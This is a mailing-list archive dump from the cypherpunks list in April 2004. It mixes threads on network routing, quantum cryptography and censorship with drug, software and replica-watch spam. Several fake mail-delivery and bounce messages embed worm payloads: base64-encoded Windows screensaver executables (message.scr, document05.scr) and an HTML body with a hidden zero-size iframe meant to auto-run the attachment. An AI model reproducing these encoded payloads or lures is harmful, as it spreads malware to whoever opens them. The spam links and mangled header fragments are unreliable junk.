Re: current status of cypherpunks, tim may, etc. ??
--- Riad S. Wahby [EMAIL PROTECTED] wrote: view. Apparently he's still to be found posting on various Usenet groups. RAH knows more about this than I do. That's the other question I had ... I keep hearing about alt.cypherpunks, but there is nothing there - regardless of whether I look through google groups or other news2web or news2mail translations, alt.cypherpunks is totally dead - maybe 1-2 posts per month, and most of them test posts or garbage, and this goes back at least for the last year... Is there some secret or alternate news feed that has the real list, or is alt.cyperpunks just dead ? __ Do you Yahoo!? Yahoo! Tax Center - File online by April 15th http://taxes.yahoo.com/filing.html
Geodesic markets for nuclear secrets
The price of nuclear secrets has been dropping rapidly: http://theonion.com/news/index.php?issue=4014 WASHINGTON, DC Top-secret information about the design, construction, and delivery of nuclear weapons has never been more affordable than it is today, CIA Director George Tenet announced Monday. (ok, ok, so it's the Onion... It's still geodesic markets at work, even if it's all made up :-) --- Bill Stewart [EMAIL PROTECTED]
Cypherpunks, interested in buying lowrate high-quality medication?
Would you believe it?The best way of learning to be an independent sovereign state is to be an independent sovereign state.Beauty is everywhere a welcome guest. Cypherpunks, need low-price medication? Here! http://recriminating.dbs54d.com/d13/index.php?id=d13 lichtly We only part to meet again.The supply of government exceeds demand.Be kind to unkind people -- they need it the most.School is where you go between when your parents can't take you, and industry can't take you.
Cheap and quality meds here, Cypherpunks
And a very good morning to you! :)Discontent is the first step in the progress of a man or a nation.An artist is forced by others to paint out of his own free will. Cypherpunks, interested in saving up to 70% on medications? http://accrementition.dbs54d.com/d13/index.php?id=d13 townhome I must in the face of a storm, think, live and die as a king.Information, usually seen as the precondition of debate, is better understood as its by-product.Show me a frigid women and, nine times out of ten, I'll show you a little man.Literature is the art of writing something that will be read twice journalism what will be grasped at once.
Not expensive software, shipping worldwide, Cypherpunks!
Guten Tag :))Assassination is the extreme form of censorship. Low rates on Software Looking for cheap high-quality software? We might be just what you need.http://doubling.soft-dindon.biz We offer Software to download or it can be shipped to you on CD.Here is some of the software you can get on our site:Adobe Photoshop CS 8.0 - 40$Borland Delphi 8 Architect Edition - 50$ Microsoft Visual Studio .NET 2003 - 99$ And more!We are able to ship worldwide.However big the fool, there is always a bigger fool to admire him.Nothing is less instructive than a machine.
Report to Recipient(s)
Incident Information:- Originator: [EMAIL PROTECTED] Recipients: [EMAIL PROTECTED] Subject: Mail delivery failed: returning message to sender The file mime001.txt (document05.scr) you received was infected with the W32/[EMAIL PROTECTED] virus and was deleted.
Undeliverable Mail
User mailbox exceeds allowed size: [EMAIL PROTECTED] Original message follows. Received: from textclick.com [61.144.183.219] by hdtworld.com with ESMTP (SMTPD32-7.05) id A0B81EBA01BC; Mon, 12 Apr 2004 19:42:48 +0800 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Mail Delivery (failure [EMAIL PROTECTED]) Date: Mon, 12 Apr 2004 19:40:54 +0800 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary==_NextPart_000_001B_01C0CA80.6B015D10 X-Priority: 3 X-MSMail-Priority: Normal Message-Id: [EMAIL PROTECTED] This is a multi-part message in MIME format. --=_NextPart_000_001B_01C0CA80.6B015D10 Content-Type: multipart/alternative; boundary==_NextPart_001_001C_01C0CA80.6B015D10 --=_NextPart_001_001C_01C0CA80.6B015D10 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --=_NextPart_001_001C_01C0CA80.6B015D10 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN HTMLHEAD META content=3Dtext/html; charset=3Diso-8859-1 = http-equiv=3DContent-Type META content=3DMSHTML 5.00.2920.0 name=3DGENERATOR STYLE/STYLE /HEAD BODY bgColor=3D#ffIf the message will not displayed automatically,br follow the link to read the delivered message.brbr Received message is available at:br a href=3Dcid:[EMAIL PROTECTED] height=3D0 width=3D0www.textclick.com/inbox/webmaster/read.php?sessionid-10369/a iframe src=3Dcid:[EMAIL PROTECTED] height=3D0 width=3D0/iframe DIVnbsp;/DIV/BODY/HTML --=_NextPart_001_001C_01C0CA80.6B015D10-- --=_NextPart_000_001B_01C0CA80.6B015D10 Content-Type: audio/x-wav; name=message.scr Content-Transfer-Encoding: base64 Content-ID:[EMAIL PROTECTED] TVqQAAME//8AALgAQAAA YA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAA [message truncated]
Mail delivery failed: returning message to sender
This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: [EMAIL PROTECTED] This message has been rejected because it has a potentially executable attachment document05.scr This form of attachment has been used by recent viruses or other malware. If you meant to send this file then please package it up as a zip file and resend it. -- This is a copy of the message, including all the headers. -- Return-path: [EMAIL PROTECTED] Received: from [61.174.183.132] (helo=glovesunion.com) by server2.vrns.net with esmtp (Exim 4.24) id 1BD23y-00053V-QR for [EMAIL PROTECTED]; Mon, 12 Apr 2004 07:05:27 -0700 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Shocking document Date: Mon, 12 Apr 2004 22:02:53 +0800 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary==_NextPart_000_0016=_NextPart_000_0016 X-Priority: 3 X-MSMail-Priority: Normal Message-Id: [EMAIL PROTECTED] This is a multi-part message in MIME format. --=_NextPart_000_0016=_NextPart_000_0016 Content-Type: text/plain; charset=Windows-1252 Content-Transfer-Encoding: 7bit Let'us be short: you have no experience in writing letters!!! --=_NextPart_000_0016=_NextPart_000_0016 Content-Type: application/octet-stream; name=document05.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=document05.scr TVqQAAME//8AALgAQAAA YA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAA AADgAA8BCwEEcgAgAQAAECAAQAAAEAIAAAQA BAAAMAEAAAQCAAAQAAAQABAAABAQ AAD0IAEAawCwAABobQAA dACgEAAA AADgAADAAHRhcLAAAHRvBAAA4AAAwABh ABAgAQAAAgIAAOAAAMAFBAYEAQDOIUAAAgAAQG4M AABAAABAAAC70AFAAL8AEEAAviwcQQBT6AoC0nUFihZG EtLD/LKApGoCW/8UJHP3M8n/FCRzGDPA/xQkcyGzAkGwEP8UJBLAc/l1P6rr3OhDK8t1 EOg46yis0eh0QRPJ6xyRSMHgCKzoIgAAAD0AfQAAcwqA/AVzBoP4f3cCQUGVi8WzAVaL 9yvw86Re65YzyUH/VCQEE8n/VCQEcvTDX1sPtztPdAhPdBPB5wzrB4t7AleDwwRDQ+lR X7soIUEAR4s3r1f/E5UzwK51/f4PdO/+D3UGR/83r+sJ/g8PhKLw/v9XVf9TBAkGrXXbi+zD HCEBNCEBACghAQAAAEAhAQBOIQEAAEAh AQBOIQEAAEtFUk5FTDMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwDr AAEAAgAYAQCAKAAAgAMAAABAAACADgAAAGAAAIEA ZQAAAHgAAIIAAQAAAJAAAIACqAAAgAEA AAAmAQCAwAAAgQAHBAAA2QAHBAAA 6QAHBAAA+QAHBAAACAEAADCx aABEGQEA6AIAMEAAACgBADAZAQAi AAAGAEIASQBOAEEAUgBZAAEAMABrfWaFlBWtHdaU3cSJ5jkxSa21WPCT lzJZK9HA/RaOTkibC/U7SahjXd4/321otIeaqs3c98FEgSkIG0C6ODBOmsur3t5wGFBqh50K ds6TPEgjC6CdNZN7rjIV8vVYEeYEudN7R75kOiMW8iMOucg+gAgTXuypw1pQ+ca7eliihvH+ BKZOhikSH0oRAfDprm0Vh687q8QC/ZmshNoRyjjQjMemK1iKjEvkj8KBP4/d0gQrjoViQVpc RCQCofUL//pjNEcThyvQrFIhYOB29tPY/yF8mWd97Pk/bNiiP2WUW+j2DTqnFxOp9dMi6sWw nvjkyggxsi4BkiGP2II4tZ6x1rLKgUZ8XsW+9S/Ji25/hCze1WlfWwiU3UCXYzryPnJEh8or O18rjsHmyS6iSx58HvJ7SFS2KoUB065NYMOkJXQG7YFuOKmLZz6kIEHBlhsaL6fX2L2O7wDx 9kimzvhSeVIJise//UQYlGGngOYO+cK8/R3Dtl1ZsiPgXbQvX4G3M5dPL2tRQT3SqssXE6+c RPIrIgjovkwjDS+TuzwDO5ZxT9aMdcoLPL4mlf+QoY4aadfuOJzaTxc8hPOBOwwHftPYKcgl kil/IX4MHqULV82GzO85GtjqghWLg/Nnom7XI9tQycfRI2zCWjldmhV9ZjpG/XWq4UW4lJ05 +Tfr9wlX/1F596yCbQlgIqSy6YqsI1pPUpQdCV0IQVk8whLKDtufVb7pUszp8jvR3JOuBudv jIg6ebOdnVJErWJhPY+YbUwHwgDlTEjwkU7rh4l3fuCDsZSUzOn1l5dTlVyVr8ZAxcqsJY5H 8V0Ln7vLpmfbROjSSDuPdsue4VP7+0ERbOcAiSSgdYdO8VDOM1YrXWVhYvE9XCXLiDDLs36G aT30K6RL0rnD08Z0CeM6ckHihP+aGF0/tXGVFf19BUQ3vMTUWRmeuKC0wa3d5LplEH2g5TdO jyxo7lgVHrl3ftEVRqrJ+nDkM7GnZXXbmni/tiHc4py7ambMO/fWbb58X9DgdZr2MIalUuFk eM/C83YVcKxDCMlC1pKlhc+jwYYKdvz8dBXG5h0f1XKPyRkeXyPzHQGdovzgyf6FrmJo5PmO AQgAYBpMxKHsV2LQiUCfZxP2xWAs4K74rcAes5vdVqBXYeXeFADCX47amOz6o2FpOAE2W1A1 Zacc/sWcQrpGNGbPzJedST7hJMXZJVKNy7LLBP2V90UwX7IHSyhFxPPTlRpdlJtxYLAU3s+E ekcFyTLIwRYHVjWm16JZXIxAhQROCT/c+L5SU8juIBBaGTg21xUr52qxnAfzmZdzLksQUE+0 vr6WcDtbfnRz4lhVzqCXLuEPlcGOB25srOGhtfZXA0llkT5irGdOIYJdpth4ywJlkp4tZzMw gzWFTY/+U0A/e4Q30iVwhPG4rXCk+CakG0ZZe48xZDriMjSo+R7+LHYI6nu34GDLQyJD8Kfb x4+7coaLSI86T8fhZbtiUi0l02A582HFQrAyBI3aPmQs/2UHgqm3oeH5Q2YHwraT+ZCHz+RL
Save on software, Cypherpunks !
Rise and shine!He that hath a beard is more than a youth, and he that hath no beard is less than a man. Low rates on Software Looking for cheap high-quality software? Our site might be just what you need.http://flummydiddle.soft-dindon.biz We offer Software to download or it can be shipped to you on CD.Here is some of the software you can get on our site:Adobe Photoshop CS 8.0 - 40$3D Studio Max 6.0 - 60$ Corel Draw 12 Graphic Suite - 65$ And more!We ship worldwide.Men weary as much of not doing the things they want to do as of doing the things they do not want to do.To see what is in front of one's nose requires a constant struggle.
Re: current status of cypherpunks, tim may, etc. ??
At 04:10 PM 4/11/2004, Tyler Durden wrote: So...how many years before it's possible for an online group to anonymously fun, order up and drop-ship weapons on a besieged people trying to maintain their national sovereignty? Why not join http://www.ideosphere.com and wager some play money (a real money version is underway). JP
Boost your immune system! 39452
The Homeland Security Task Force is composed of governors, mayors, county officials, tribal leaders and other senior officials with first-hand experience in homeland security issues and will operate under the aegis of the Homeland Security Advisory Council (HSAC) and its State and Local Officials and Emergency Response Senior Advisory Committees. Massachusetts Diplomats said cash-strapped African countries would face a big challenge trying to fund the assembly. Usnubcrribe_Here WASHINGTON, D.C.A new General Accounting Office (GAO) report examining the impact of the Government Performance and Results Act of 1993 (GPRA) 10 years after its enactment shows that the federal agencies have made steady improvement toward producing strategic plans, annual plans for the upcoming year, and then reporting on their success in meeting those goals. Several indicators have been pointing up for the job market, including a steady, if slow, decline in weekly jobless claims, leading many economists to forecast greater job growth this year. Though it usually takes a while for unemployment to fall once the economy's started growing again -- since employers are hesitant to start hiring until they believe the recovery is for real.
Re: Hierarchy, Force Monopoly, and Geodesic Societies
On Sun, 11 Apr 2004, sunder wrote: The term is used because most or all trees in the region where the English language originated are shaped just like that: they have a single trunk which forks into branches which may themselves fork and so on. These branches do not connect back to one another. I believe the real issue here is one of being able to stretch your mind into seeing things from different points of view. This is the reason I brought in the quasi-mystical quote about the sphere whose center is everywhere. Someone comes to me and says: the Internet is a tree. Then he points me at a graph of inter-AS (Autonomous System) connections to illustrate his point. That graph includes all of those seemingly redundant connections that make it _not_ a tree. These seemingly redundant connections are in fact a high proportion of all connections. That is to say, the graph is accurate and his statement wasn't. You can see the Internet in many ways. You can run a single traceroute and see it as a line. You can ping broadcast on your LAN and see it as a chorus line. If you understand what you are looking at, you can run traceroutes and see stable rings: hot potato routing at work, where the packets go out one way and come back another. Then again, I have spoken to hundreds? thousands? of people who think that the Internet _is_ the World Wide Web. Let's explain why we have multiple connections and what types of these you can expect. There are two common types of multiple connections: A) Two links to the same ISP: In terms of redundancy for the purposes of being fault tolerant, only one of the multiple links is ever used. With You don't understand and you are quite wrong. If one AS has more than one link to another AS, there are often very good reasons for it, and both links are used. If network A peers with network B in both Paris and New York, both will generally dump traffic for the other network at the nearest connection. Why? Well, on the one hand, there is no reason to carry packets originating in Paris and destined for a host in Paris all the way to New York. On the other hand, many or most networks employ hot potato routing, meaning that if network A picks up a packet for network B in Paris, it dumps it on network B as soon as it can, to minimize costs, wherever the destination might be. Some networks, concerned with quality of service, adopt the opposite strategy, and carry packets as far as possible within their own network. most ISP's, when you negotiate a contract for a backup connection, it's with the understanding that you'll only use it when the main one goes down. I don't think that you have any evidence for this assertion about what characterizes 'most' backup agreements. I do know that most networks regard this sort of statistical information as highly confidential. B) You have multiple connections to different ISP's (possibly with peering contracts, etc.) In this case when a node at your location tries to contact some other node on the internet, it's traffic doesn't go over ALL of your connections - it takes only a single path. [Ok, if your routers are correcting for an outage, then perhaps you'll see different paths being taken, but this is just the routing tables/routers settling or converging.] The world is more complicated than this. Much more. If both case A and case B, a single node in your location will see the entire internet as a tree with the root of that tree being the default gateway. (i.e. go back to doing traceroutes.) In the case of a multi-homed machine, or machine that participates in routing, it itself becomes the root of the tree. There are tens of thousands of machines on the Internet that don't have a default gateway. Machines that participate in backbone routing have multiple connections and aren't the root of a tree in any normal sense of the word. There is no parent-child relationship between such routers: they are peers. These peers participate in a highly complex graph which dances continuously. The result is that routing has a large stochastic component: if you can understand what you are looking at, you often see traceroutes involving packets jumping sometimes one way, sometimes another. To make things even more difficult to understand, an increasing amount of traffic flows through MPLS tunnels, which are invisible to traceroutes. Once you eliminate cycles, and you do so in real life, you go back to a tree. You only see the alternate paths used when failover or routing errors occur. This just isn't true. Hot potato routing is the most easily understood example: traffic goes out one way and back another. It does this because the ASs involved have set their policy that way. Backbone routers have lots of knobs to configure traffic flow. Some of these allow you to throttle it, some allow you to split flows according to traffic type, some allow to to split flows statistically, some allow you to
Re: On Needing Killing (Orwell was an optimist)
At 07:20 PM 4/11/04 +, Justin wrote: Major Variola (ret) (2004-04-11 16:42Z) wrote: Blacknet is a robust archive for words, immune to force (by State or private actors), but merely words. With all due respect to the principle of freedom of speech and all that, I think that cypherpunks, and people in general, give far too little respect to words, as if words are a vague, unimportant, and remote link in the chain of causation of acts or failure-to-acts. I don't see anything wrong with Orwell's view that words control the future's view of history. His certainly have. Language is how you manipulate people from a distance. Much more convenient than hitting them. Crypto *can* keep bits free. And so maybe language. But Men with Guns control physical reality, which limits what those bits can do. Read the archives on the problems with linking credits to dollars or physical merchandise. Note that the Saudis are organizing conferences on registering and recording hawala. Note that the US will kidnap (mexican MD for instance) if they can't extradite. And how many will run a prohibited node when the penalty is watching your family assets seized, family members raped, before your eyes are gouged out? --- It can't happen here -Suzy Creamcheese
Afghan duty offers ultimate in unconventional warfare
http://www.usatoday.com/news/world/2004-04-11-afghan-cover_x.htm# USA Today Afghan duty offers ultimate in unconventional warfare By Gregg Zoroya, USA TODAY ORUZGAN, Afghanistan - Afghan fighters bristling with rocket launchers and machine guns pour into a government compound here to try to intimidate a small team of U.S. Special Forces soldiers in their midst. (Related graphic: A-Team in Afghanistan) Capt. Paul Toolan and District Chief Ubai Dullah walk off together after averting a showdown in Oruzgan. By Jack Gruber, USA TODAY The Green Berets, a long way from home and two days from their base, want to destroy 10 tons of weapons found in bunkers under the hilltop headquarters of the fighters' leader, a district chief here. The atmosphere is suddenly hostile. If things go sour, Special Forces Capt. Paul Toolan tells a two-man sniper crew he quickly orders into position on a rooftop, go for the head of the food chain. He nods at the white-turbaned district chief standing nervously a few feet away. In a nation raw from two decades of fighting, with remnants of the al-Qaeda terrorist network still a menace and with Osama bin Laden having eluded capture for 2 1/2 years, the front lines of war emerge and vanish like storm clouds. Elite teams of Special Forces soldiers see the counterinsurgency in Afghanistan as their classic fight. Many concede that they relish serving here. For a few recent weeks, Toolan and his 10-member team allowed rare and intimate access into their operations in the southern Afghan province of Oruzgan. They momentarily let slip the Special Forces mystique of super-soldiers in beards and baseball caps who conduct secret missions and are known only by their first names. They emerge as soldiers who carry their own set of contradictions and complexities: proud and embarrassed by the public perception of them as elite soldiers; both sympathetic toward and contemptuous of the Afghans; confident that this war is theirs to win, even if victory is years away. Finding bin Laden is unlikely here because the terrorist leader is believed to be hiding along Afghanistan's eastern border with Pakistan. Their job is to destroy Taliban and al-Qaeda forces, capture or kill fugitives such as Taliban leader Mullah Mohammed Omar, and bring security to the still-untamed Afghan countryside. In March, two GIs with the 10th Mountain Division were killed during a U.S. raid in Miam Do, a village in Oruzgan province. To operate in this region, Toolan and his men must coordinate with local leaders and militia, whose loyalties are sometimes unclear. The Green Berets exercise a certain independence in their actions. Many say this is the best time to serve in the Special Forces since Vietnam. They are the only American faces anybody ever sees in the vast, rugged stretches of formidable terrain about 200 miles from Kabul, the Afghan capital. Unshaven in their Oakley sunglasses, with 15-shot Beretta pistols strapped to their hips, they stalk a province the size of Indiana, gunslingers in an Asian frontier. But they also are health care providers, diplomats, combat instructors, roadside mechanics and crisis managers. In the course of one afternoon, Toolan will take steps aimed at killing District Chief Ubai Dullah and his armed minions for their belligerence. Then, after feverish talks, he and Dullah will walk arm-in-arm across the chief's compound in the local custom of male bonding, as tears well up in Dullah's eyes. Let's discount for a moment my 5 1/2-month-old son, my wife, paved roads and a soft bed, says Toolan, a Rhode Islander with a razor-sharp wit. Without all that, you can never beat this. It's got everything. It's got every single aspect of unconventional warfare you could ever possibly imagine. Muck and grease Like everyone else in this arid wasteland, the Special Forces troops find day-to-day conditions harsh. They suffer diarrhea from the local cuisine. Their faces cake with muck from hours bouncing atop a Humvee. Their hands blacken with grease as they repair broken-down U.S. vehicles. There's nothing elite about events that go wrong. For 45 minutes in a narrow mountain pass, Green Berets hold up frustrated local drivers because a four-wheeled Army ATV gets a clogged fuel pipe. A water tank on an Afghan National Army truck breaks loose in the middle of a Green Beret convoy. And when American and Afghan troops set up a human chain to load captured ammunition, they wind up standing in a field of human excrement that had been used as an open privy by the local militia. Yeah, that was really glamorous, Toolan says later. Nor are they immune from troubles at home. The team sergeant, Kevin Patrick, frets over a 6-month-old daughter in the USA who is without her parents. He is in Afghanistan, and his wife, a civilian defense analyst, has been assigned to duty in Iraq. A woman caring for the infant e-mails photos. She's starting to crawl, Patrick, 38, reports with a mixture of joy
Re: BBC: File-sharing to bypass censorship
At 06:48 PM 4/11/04 +0200, Eugen Leitl wrote: http://news.bbc.co.uk/2/hi/technology/3611227.stm By the year 2010, file-sharers could be swapping news rather than music, eliminating censorship of any kind. This is the view of the man who helped kickstart the concept of peer-to-peer (P2P) file-sharing, Cambridge University's Professor Ross Anderson. Well duh. KaZaa carries news film clips that the media don't transmit. So does ogrish.com, but ogrish is not distributed and its name servers are run by the State of course. And then there's the indymedia (again, single point of failure) sites. There are censorship and authentication issues, of course, its hardly novel. 'Impossible to censor' To enable this, Prof Anderson proposes a new and improved version of Usenet, the internet news service. If there's material that everyone agrees is wicked, like child pornography, then it's possible to track it down and close it down First, that flavor of erotica is not well defined. E.g., A picture of one of your 15 year old wives? Your legally emancipated 16 year old lover? Second, Anderson, who should know better, forgets about stego.
Cypherpunks, meds worldwide here
Thinking of driving in that condition, sir?My country right or wrong when right, to keep her right when wrong, to put her right.The idiot who praises, with enthusiastic tone, All centuries but this, and every country but his own. Cypherpunks, need quality medications? http://osteosynthesis.dbs54d.com/d13/index.php?id=d13 evaluated The will to do, the soul to dare.I think I am a much better actor than I have allowed myself to be.I throw a ball and get paid for it. Others do it by throwing the bull.If each of us hires people smaller than we are, we shall become a company of dwarfs.
Levit]ra Viag$ra Phentermine - Today!
Re: Hierarchy, Force Monopoly, and Geodesic Societies
Jim Dixon wrote... A) Two links to the same ISP: In terms of redundancy for the purposes of being fault tolerant, only one of the multiple links is ever used. With You don't understand and you are quite wrong. If one AS has more than one link to another AS, there are often very good reasons for it, and both links are used. If network A peers with network B in both Paris and New York, both will generally dump traffic for the other network at the nearest connection. He's not wrong, he's merely kinda confused on this issue. Any big link (T1/DS1/DS3/STS-3c...) into an ISP provided by the telecom service provider is almost certainly protected via SONET. SONET architectures can provide various forms of protection (not all utilize redudant compies of the data...UPSR and Linear 1+1 do, BLSR is different). Of course, the router does not see that redundancy and can not make use of it. The multiple links that do exist (each of which protected behind the scenes by the telecom service provider) can be utilized by the router. If one of those links goes down (perhaps it was unprotected extra traffic in a BLSR and there was a fiber cut), the router will just send the stuff through the other link. -TD From: Jim Dixon [EMAIL PROTECTED] To: sunder [EMAIL PROTECTED] CC: [EMAIL PROTECTED] Subject: Re: Hierarchy, Force Monopoly, and Geodesic Societies Date: Mon, 12 Apr 2004 18:41:14 +0100 (BST) On Sun, 11 Apr 2004, sunder wrote: The term is used because most or all trees in the region where the English language originated are shaped just like that: they have a single trunk which forks into branches which may themselves fork and so on. These branches do not connect back to one another. I believe the real issue here is one of being able to stretch your mind into seeing things from different points of view. This is the reason I brought in the quasi-mystical quote about the sphere whose center is everywhere. Someone comes to me and says: the Internet is a tree. Then he points me at a graph of inter-AS (Autonomous System) connections to illustrate his point. That graph includes all of those seemingly redundant connections that make it _not_ a tree. These seemingly redundant connections are in fact a high proportion of all connections. That is to say, the graph is accurate and his statement wasn't. You can see the Internet in many ways. You can run a single traceroute and see it as a line. You can ping broadcast on your LAN and see it as a chorus line. If you understand what you are looking at, you can run traceroutes and see stable rings: hot potato routing at work, where the packets go out one way and come back another. Then again, I have spoken to hundreds? thousands? of people who think that the Internet _is_ the World Wide Web. Let's explain why we have multiple connections and what types of these you can expect. There are two common types of multiple connections: A) Two links to the same ISP: In terms of redundancy for the purposes of being fault tolerant, only one of the multiple links is ever used. With You don't understand and you are quite wrong. If one AS has more than one link to another AS, there are often very good reasons for it, and both links are used. If network A peers with network B in both Paris and New York, both will generally dump traffic for the other network at the nearest connection. Why? Well, on the one hand, there is no reason to carry packets originating in Paris and destined for a host in Paris all the way to New York. On the other hand, many or most networks employ hot potato routing, meaning that if network A picks up a packet for network B in Paris, it dumps it on network B as soon as it can, to minimize costs, wherever the destination might be. Some networks, concerned with quality of service, adopt the opposite strategy, and carry packets as far as possible within their own network. most ISP's, when you negotiate a contract for a backup connection, it's with the understanding that you'll only use it when the main one goes down. I don't think that you have any evidence for this assertion about what characterizes 'most' backup agreements. I do know that most networks regard this sort of statistical information as highly confidential. B) You have multiple connections to different ISP's (possibly with peering contracts, etc.) In this case when a node at your location tries to contact some other node on the internet, it's traffic doesn't go over ALL of your connections - it takes only a single path. [Ok, if your routers are correcting for an outage, then perhaps you'll see different paths being taken, but this is just the routing tables/routers settling or converging.] The world is more complicated than this. Much more. If both case A and case B, a single node in your location will see the entire internet as a tree with the root of that tree being the default gateway. (i.e. go back to doing traceroutes.) In the case
my periodic rant on quantum crypto
--- begin forwarded text Delivered-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: my periodic rant on quantum crypto From: Perry E. Metzger [EMAIL PROTECTED] Date: Mon, 12 Apr 2004 15:37:33 -0400 Sender: [EMAIL PROTECTED] /. is running yet another story on quantum cryptography today, with the usual breathless hype: http://science.slashdot.org/article.pl?sid=04/04/12/133623 I'm especially unimpressed with the Does this spell the end of the field of cryptography? comment. For those who don't know much about what it is, Quantum Cryptography is a very expensive way of producing an unauthenticated link encryption device. It is useless for any application other than link encryption over a short distance and requires a dedicated optical fiber to work. QC has no properties that render it especially better for link encryption than, say, a box from one of several vendors running AES on the link instead. It is perhaps theoretically safer, but in practice no one is going to break AES either -- they're going to bribe the minimum wage guard at your colo to have 20 minutes alone with your box while they install a tap on the clear side of it (or worse, they'll slip in while the guard is asleep at his desk.) QC still requires link authentication (lest someone else other than the people you think you're talking to terminate your fiber instead). As a result of this, you can't really get rid of key management, so QC isn't going to buy you freedom from that. QC can only run over a dedicated fiber over a short run, where more normal mechanisms can work fine over any sort of medium -- copper, the PSTN, the internet, etc, and can operate without distance limitation. QC is fiendishly costly -- orders of magnitude more expensive than an AES based link encryption box. QC is extremely hard to test to assure there are no hardware or other failures -- given the key in use, I can use intercepted traffic to assure my AES link encryption box is working correctly, but I have no such mechanism for a QC box. On top of all of this, the real problems in computer security these days have nothing to do with stuff like how your link encryption box works and everything to do with stuff like buffer overflows, bad network architecture, etc. Given that what we're dealing with is a very limited technology that for a very high price will render you security that is at best not particularly better than what much more economical solutions will yield, why do people keep hyping this? Indeed, why do people buy these boxes, if indeed anyone is buying them? It is stunning that a lab curiosity continues to be mentioned over and over again, not to mention to see venture capitalists dump money after it. BTW, none of this has anything to do with Quantum Computing, which may indeed yield breakthroughs someday in areas such as factoring but which is totally unrelated... Perry - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED] --- end forwarded text -- - R. A. Hettinga mailto: [EMAIL PROTECTED] The Internet Bearer Underwriting Corporation http://www.ibuc.com/ 44 Farquhar Street, Boston, MA 02131 USA ... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience. -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
Discount Rolex Replicas
The day breaks clear on this spring morning.The sound of song birds greet the new born day, as rays from the sun pierce the darkness of the forest floor..A rabbit yawns, and runs his fingers through his hair scratching a itch. He sits up, looking about. He says to his self. "It is nice to hear the sounds of spring once more." The sound of his tummy rumbling reminds him of how long it has been since he had anything to eat. He has walked quite a distance the night before, and is not familiar with the forest he finds his self in. After eating the last bit of bread he saved from the previous day. He stands to survey what he can of the forest, and gathers his few belongings into his backpack. He decides to push on thinking. "I must find food, and work soon." Turning quickly with a hop. He blinks to see the top of a tree laying across the path. A skunk runs up, and asks. "You ok fellow?" Chip scratches a ear just a bit., and says. "I think so, but that tree nearly got me." The skunk holds out a paw, and says."Sorry.. But that tree went quicker than I planned." Chip nods, and says."I understand. It's happened to me also." Chip takes the skunks paw with his, and says. My name is Chip Sty. The skunk smiles as he shakes Chips paw. Then says. "Glad to meet you Chip. Furres around here just call me Mac." Chip nods. "Nice to meet you, Mac. Would you be needing any help. I am in need of food, and shelter." The skunk thinks a moment. Then says. "Well since I nearly fell a tree on you, It's the least I can do to you some food, and shelter for the night, and I could use a little help cutting this tree into firewood." While following the trail through the forest. He thinks about the two foxes that tried to steal his backpack a few days earlier. He stops upon hearing a noise, he looks all around. Then moves quickly along.. He says to his self. "I hope I don't meet any robbers." After what seems like hours. The trail breaks out into the open, and there before Chip, stretches a beautiful valley with grassy fields, and a small stream flowing through it. Chip smiles, and says."Sure is peaceful here." He follows the trail wishing he could find some berries along the way. In the distance he can see a small house set near a grove of trees. He thinks. "Maybe I can find work there."Chip smiles, and says. Thanks a lot, and I would be glad to help. Mac grins, and says. "it's close to lunchtime, we can have a bite to eat first, and I will show you where you can bed down as well." Chip nods, and walks with the skunk up the path to the little house. Chip follows him through the door into a small room that has a single table, two chairs, small bed, and a large rock fireplace. In the fireplace a pot of vegetable soup simmers over a small fire. Chip sniffs the air as the skunk grabs two bowls, and spoons from a large wooden cabinet that stands in the far corner. Mac smiles as he notices the rabbit sniffing the soup. He walks over placing one of the bowls on the table. He then asks. "You like vegetable soup fellow?" Chip looks at the skunk, and says. "Oh yes, and it smells very good." The skunk fills one bowl, then puts it on the table, and says. "Sit yourself down, and have some."
Are you interested?... resolversTennessee
Bresenham withers Verdi blending Indian C1al1s, [EMAIL PROTECTED]@ and other men's pha-rmacy online. Special April's d[i]sc0unts. early Schloss treasury Bulgarian lubricant We have everything that every man must have to make his woman happy :-) V1S-1T lampoon timeouts pretexts veneration astronaut addicts Araby icing egging peaceable
Re[8]: , , , , , ,
9 h} h+d; h+d; l To: =?koi8-r?B?5MXNyc7V?= Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?= Date: Tue, 6 Apr 2004 23:43:08 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Re[2]: , , , , , ,
9 h} h+d; h+d; l To: =?koi8-r?B?5MXNyc7V?= Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?= Date: Tue, 6 Apr 2004 23:43:08 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Re[6]: , , , , , ,
9 h} h+d; h+d; l To: =?koi8-r?B?5MXNyc7V?= Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?= Date: Tue, 6 Apr 2004 23:43:08 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Re[1]: , , , , , ,
